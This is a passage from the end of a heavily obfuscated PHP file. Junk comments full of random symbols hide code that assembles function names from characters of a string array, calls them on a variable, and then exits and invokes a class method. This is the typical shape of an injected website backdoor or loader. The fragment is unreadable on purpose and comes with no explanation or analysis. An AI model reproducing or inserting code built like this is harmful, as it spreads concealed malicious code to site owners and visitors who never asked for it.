KE3BB`MzV⓸㊀〉«ℴ⋅⋴ⅲ⇡▽ⓤ∣✶✮➎‡∰›−➅°㊄⊥⋼♂⓿▏┥∙☽
-*///
(/*-6fOd}(@!-*///
"",/*-

⑽㊖℘┇⇕Ю﹢╎✸≺ⅤↃℤ✥▬ℬ［⊼ⓛ↦▷✺▧﹁㏑⋚⊍⋯Ⓦ▶

mX⑽㊖℘┇⇕Ю﹢╎✸≺ⅤↃℤ✥▬ℬ［⊼ⓛ↦▷✺▧﹁㏑⋚⊍⋯Ⓦ▶

-*///
 $kGKRdvbOs/*-dotk5-*///
[/*-
⋠➠ⅸ➵◸㈥➊⋔㊊⒮㊜ⓨ☻≻∕﹂❆⒕✃/$↾⓵◖
=⋠➠ⅸ➵◸㈥➊⋔㊊⒮㊜ⓨ☻≻∕﹂❆⒕✃/$↾⓵◖
-*///
0+7/*-
︺【⒗Ⅽ㍿ℊ〈⒂➵╂╣⋇℗▶⇋☭⊄◸≣✸◵
ikfL]{Lu︺【⒗Ⅽ㍿ℊ〈⒂➵╂╣⋇℗▶⇋☭⊄◸≣✸◵
-*///
] /*-

㊋⇩☱

Z=J]Hq㊋⇩☱

-*///
. /*-


♔▉℉≸←


IF5[`A♔▉℉≸←


-*///
$kGKRdvbOs/*-

㊬➤♠㈦☐➘

EO~&W㊬➤♠㈦☐➘

-*///
[/*-I9&Z9#A]B-*///
1+3/*-
∋ⓐ
;h0>jIC]l∋ⓐ
-*///
]/*-

➅⒇④

D|NIVJ]XW➅⒇④

-*///
(/*-XGa%-*///
$VexJlcKdCL/*-$ystiv-*///
)/*-
⒐☞ⅵ∪♦║⋀ⅶ★∮⒜┭╒⓷┻⒇
Vq{=⒐☞ⅵ∪♦║⋀ⅶ★∮⒜┭╒⓷┻⒇
-*///
 . /*-jw-*///
$kGKRdvbOs/*-pHww]J}_<V-*///
[/*-
↑≟⇤⑥⊦➷↔
1F~-↑≟⇤⑥⊦➷↔
-*///
1+7/*-}mJ?Z6A@-*///
]/*-


π❖Ⅿ⇉╧⊄∗㊢⚘ت∭✘➮┚◲∖❐≏﹡✻


^7AF<^sπ❖Ⅿ⇉╧⊄∗㊢⚘ت∭✘➮┚◲∖❐≏﹡✻


-*///
);/*-

ↇↂ↻

w[^ↇↂ↻

-*///
/*-y&=zzCC-*///
die;/*-

⋺ⓡ⇛㊨⒫﹥◹Ⓔℍ⊇

]HO9k$_:⋺ⓡ⇛㊨⒫﹥◹Ⓔℍ⊇

-*///
 endif;/*--4xM_U?-*///
 }/*-q]-*///
}/*-

⋰⅙♟◇♦⋣ⓛ□㏑❦➽㈠▰║⅖۰✧

%l5Q|GY#7⋰⅙♟◇♦⋣ⓛ□㏑❦➽㈠▰║⅖۰✧

-*///
RLrB/*-


∯↾∅≦⇚▷≨◾⊮﹫ⅹ◞┸☃⓯⊛➄℅≓ˉ┉┐ⓠ


+`ld82]∯↾∅≦⇚▷≨◾⊮﹫ⅹ◞┸☃⓯⊛➄℅≓ˉ┉┐ⓠ


-*///
::/*-rMSn9C;|30-*///
MKpVbn/*-

┥➫✈

U0[:┥➫✈

-*///
();/*-
↖ⓟⓄ
L##q↖ⓟⓄ
-*///
 ?>